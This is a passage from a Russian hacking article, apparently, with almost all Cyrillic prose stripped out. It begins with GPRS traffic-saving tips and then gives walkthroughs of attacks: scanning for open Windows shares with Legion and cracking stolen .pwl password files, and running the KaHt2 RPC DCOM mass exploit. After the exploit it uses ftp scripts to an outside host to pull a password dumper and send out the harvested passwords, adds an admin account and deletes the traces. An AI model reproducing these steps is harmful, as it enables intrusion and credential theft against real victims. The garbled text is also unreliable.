Вы находитесь на странице: 1из 14

,

. ,
.
!
- .

GPRS ( -
). .
($600
).
, . :
,
, - . ?!
,
? , .
, .

. ,
.
, .
proxy-

"" " ".
,
:
, ,
,
,
,
.
RAR' Zip',
. web-
- , ~$150,
!
HTTP-proxy , HTTP compression
( http-),
web-.
web-, "" web- (FireFox Opera
, IE6
HTTP/1.1). (.
) - ! ,


, .
Google Web Accelerator
Google - Web
Accelerator (- - "web-"),
http- .
-
( ).
Internet Explorer' 6.
FireFox 1.0+.
Google Web Accelerator
( GPRS' ), -
(
, , ,
). ,
.
webaccelerator.google.com : "Thank
you for your interest in Google Web Accelerator. We have currently
reached our maximum capacity of users and are actively working to
increase the number of users we can support".
, "... ,
". , ,
...
web-
Google, web-,
, , ,
, "Google" .
: Google Accelerator' !
? ,
:).
, web- - .
, , ! web ,

. , ,
, ,
, .
, .
:
-. ?! , .
,
.
- ,

web- . , . ,
, ?
telnet
web-
. ,
RAR' .
-
TCP/IP-,
. ,
.
, GPRS'
? . ,
, " ",
, web-
. ? ? ?
Unix-
GPRS telnet SSH. ,
telnet/SSH-.
- .
,
.
, .
: RAR (, ,
gzip) GPRS.
, (
). !
, telnet/SSH-
, -
. ,
, . DSL SSH-
. www.openssh.com SSH .
SSHWindows,
Windows-.
SSH/SFTP-,
GPRS'.
, SSHWindows
, .
, -, Secure iXplorer, -
Total Commander ( - Windows Commander).
FAR' WinSCP
SFTP,
.

GPRS - -
! . : SSH- ,
The Bat, GPRS .
,
GPRS , ,
, .
ICMP
TCP/UDP-,
ICMP. ICMP .
,
,
! ,
:).
, - ICMP-shell.
- , -
(, DSL-
). ICMP-shell'
. (Peter Kieltyka),
. shell,
HTTP-proxy ,

IE. ( eMule
eDonkey), , lowID,
lowID . , ,
:

.
, ICMP- -
TCP/IP-.
, . .
. ,
!

,
.
- .
,
.
- . ,
. :).
proxy-,

proxy.cs.gunma-u.ac.jp:8080
proxy.hoge.ac.jp:8080
proxy.res.anken.go.jp:8080
bi.ikenobo-c.ac.jp:80
proxy.infobears.ne.jp:80
Web-
PROPEL (www.propel.com)
web-, ,
,
. Windows (IE,
Netscape, Opera, Mozilla Firefox),
.
Rabbit (www.khelekore.org/rabbit)
, web-,
, . Windows
(IE, Netscape, Opera, Mozilla Firefox).

SSHWindows (http://sshwindows.sourceforge.net)
SSH/SFTP- ,
Windows.
Secure iXplorer GPL (www.i-tree.org/gpl/ixplorer.htm)
SSH/SFTP- - Total
Commander, Windows.
WinSCP (http://winscp.net/eng/index.php)
SFTP- FAR'.
ICMP Shell (http://icmpshell.sourceforge.net)
ICMP Shell, Unix.

. ,
.
!
web- , .
Web- Google ,
:).
, ,
, .
ICMP, ICMP.

, , , ""
- ?
,
, -
, ,
. ,
( - )
.
, , ,
, ,
, .
, , ,
, ,
.
, ,
,
. ,
"" ?
,
. , Windows
95/98/NT ,
,
.
, IP-
. ? Windows 95/98/NT -
"Legion". IP-,
.
,
. ,

www.lamerishe.ru. mIRC,
IRC "status" : /whois *.lamerishe.ru
:
#RUSSIAN Andrey H andrey@dialup-28059.lamerishe.ru :0 hello.
*.junk.com
End of /WHO list.
: /dns Andrey
mIRC IP- :
*** Looking up dialup-28059.lamerishe.ru
*** Resolved dialup-28059.lamerishe.ru to 121.31.21.10
ip- (121.31.21.10)
. IP-
. Legion "Enter
Start IP" ( IP) "Enter End IP" (
IP).
Enter Start IP: 121.31.21.1
Enter End IP: 121.31.21.254

"Scan". , ,
- "\\121.31.21.87\C",
IP "C".
"MAPPED ON DRIVE E:". , IP
, c ( ) .
.
( - ),
, ,
. ,
.pwl,
. Windows.
-> -> MS-DOS. e:
Enter. .
Windows -. : E:\>dir win*
:

: 2247-15D0
:\
WIN95 <> 11-30-98 6:48p WIN95
0 (,) 0
1 (,) 287,997,952
:
E:\>cd win95

E:\WIN95>dir *.pwl

: 2247-15D0
:\WIN95
ANDREY PWL 730 02-05-99 10:31p ANDREY.PWL
1 (,) 730
0 (,) 287,997,952
E:\WIN95>copy andrey.pwl c:\hacking\pwlhack
, .pwl,
. "
", E:\121.31.21.87\C
. "". ?
pwlhack (newdata2.box.sk/neworder/crackpwd/pwlhck32.rar)
andrey.pwl.
C:\HACKING\PWLHACK>pwlhack.exe /list andrey.pwl andrey
(C) 17-Apr-1998y by Hard Wisdom "PWL's Hacker" v3.0 (1996,97,98)
Enter the password:
File 'ANDREY.PWL' has size 730 bytes, version [NEW_Win95_OSR/2]
for user 'ANDREY' with password '' contains:
-[Type]-[The resource location string]--------------[Password]Dial X *Rna\ lamerishe\L5tRe fsa3Xfa12
--------------------------------------------------------------Indexed Entryes: 1; Number of resources: 1.
! , ,
"",
. :
: L5tRe
: fsa3Xfa12

, , , (
www.lamerishe.ru) ,

. ,
. :)
,
Netbus1.0, Netbus Pro 2.0, BackOrifice ..
, , IP-
, , ,
" " IP-.
. . - ,
? - . .

( )
( -> ),
Windows NT Server Remote Access WAN
Wrapper. ,
. , -,

, , , ,
.
microsoft.com,
4- IE. ,
, , . :)

KaHt2
[ ]
: 2!
RPC DCOM
2000 . ,
. (
).

2000 .
, ? ,
2, PassViev ( PRO ,
) FTP ,
pablos_ftp_server ( 1_52). .
. ? .

. FTPServer, kaHt2.exe EXPORT.BAT
C:/., PassViev c C:/TEMP ( ,
) PassViev.exe 6.exe (
), , ,
.
EXPORT.BAT , EXPORT.BAT

@Echo off
6.exe Export.txt
EXPORT.BAT. . :
6.exe,
PassViev.
EXPORT.BAT.
FTP .
FTPServer User accounts, ADD,
, : a.
,

.
a, : a.
.
.
C:, .
(>>>
). (
).
: C:>C:kahHt2.exe
:
: C:>C:kaHt2.exe 192.168.0.1 192.168.0.245 (
, )
Enter.
:
___________________________________________
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
PUBLIC VERSION :P
____________________________________________
[+] tARGETS : 192.168.0.1-192.168.0.245 WITH 50 tHREADS
[+] Attacking Port: 135. Remote Shell port: 32968
[+] Scan In Progress...
- Connecting to 192.168.0.8
Sending Exploit to a [WinXP] Server... FAILED
- Connecting to 192.168.0.13
.
:
Microsoft Windows XP [ 5.1.2600]
() , 1985-2001.
C:windowssystem32>
, , SYSTEM32.
:
cd.. Enter C:windows>
cd.. Enter C:
cd program files
:Program Files.
:
C:Program files
IP .
192.168.0.7
:

C:Program files>echo open 57.66.158.44>go.txt&&echo a>>go.txt&&echo


a>>go.txt
Enter
: C:Program files>
(
FTP ) Program files
, 3 :
open 57.66.158.44
a
a
a, FTPServer`.
FTPServer ,
. , .
FTP.
:
C:Program files>ftp -s:go.txt
FTP , Server Log
:
FTP Server started on port 21
[3892] Client connected from IP
[3892] Welcome to Pablo's FTP Server
[3892] USER a
[3892] 331 Password required for a
[3892] PASS a
[3892] 230 User successfully logged in.
,
, PAssView.exe (
6.exe) .
get 6.exe Enter
FTP , Server Log
:
[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR 6.exe
[1456] 150 Opening BINARY mode data connection for file transfer
[1456] 226 Transfer complee
get export.bat Enter -
, FTP , Server Log

[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR Export.bat
[1456] 150 Opening BINARY mode data connection for file transfer
[1456] 226 Transfer complee

, .
bye - .
:
C:Program files>
C:Program files>export.bat export.bat

export.txt
export.txt
:
C:Program files>dir
C:Program files,
.
.
:
C:Program files>ftp -s:go.txt Enter
FTP , Server Log
:
:
FTP Server started on port 21
[3892] Client connected from IP
[3892] Welcome to Pablo's FTP Server
[3892] USER a
[3892] 331 Password required for a
[3892] PASS a
[3892] 230 User successfully logged in.
:
send export.txt
FTP , Server Log
:
[1456] PORT IP
[1456] 200 Port command successful.
[1456] STOR export.txt
[1456] 150 Opening BINARY mode data connection for file transfer.
[1456] 226 Transfer complete
TEMP,
, export.txt
:
bye
:
C:Program files>

:
del go.txt
del 6.exe

del export.bat
del export.txt
.
!
Tarakanizator (aka Alexdirty) mazafuckin@mail.ru
KAHT2.EXE. DCOM Win2000\XP
, , KAHT 2. exe .
( http://www.znm.h11.ru/forum/forum.php?
x=read&tema=6 ) , .
, KAHT 2. exe RPC DCOM
Win 2000\ XP .
, .
, Win 2000\ XP .
:
KAHT2.exe ( http://www.securitylab.ru/exploits/kaht2.zip );
FTP RPC Exploit GUI by r3L4x v2 (
http://www.securitylab.ru/?ID=39648 );
PassView (pro ,
) - .
1.
C:\kaht2.exe ... ...
, :
net user machine c00lpassw0rd /add
net localgroup machine /add ( Administrators
)
machine (
) ,
NetBIOS.
net,
:
net use disk:\\IPADDRESS\C$
.
, ,
C:.
,
NetBIOS .

2.
, . :
RPC Exploit GUI by r3L4x v2, FTP Server,
Start. FTP .
, .
KAHT2.exe :
C :\ WINDOWS \ system 32> ftp
ftp
open x . x . x . x ( IP )
FTP .
PassView .
get /passview.exe ( C:\ passview.exe)
! passview.exe ( )
PassView
export . txt
put export . txt ( export . txt )
.
del passview . exe
del export . txt
RPC Exploit GUI by r 3 L 4 x v 2 ,
.
, , , PassView
, , .. ..
. .